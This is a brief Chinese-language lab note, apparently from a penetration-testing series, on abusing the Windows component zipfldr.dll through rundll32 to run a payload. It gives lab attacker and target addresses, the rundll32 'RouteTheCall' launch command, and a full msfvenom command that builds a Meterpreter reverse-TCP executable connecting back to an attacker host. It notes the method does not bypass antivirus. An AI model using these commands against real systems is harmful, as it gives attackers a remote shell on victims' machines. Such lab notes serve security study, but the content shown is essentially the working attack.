0x00 zipfldr.dll简介:
zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。
0x01 环境
攻击机 kali 192.168.5.102
靶机 win7 192.168.5.101
装有av
0x02复现
攻击机
靶机rundll32.exe zipfldr.dll,RouteTheCall shellcode.exe
弹回
0x03 shellcode.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=10129 -f exe > shellcode.exe
0x04 总结
不过av
0x05 借鉴
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/90_基于白名单zipfldr.dll执行payload第十八季.html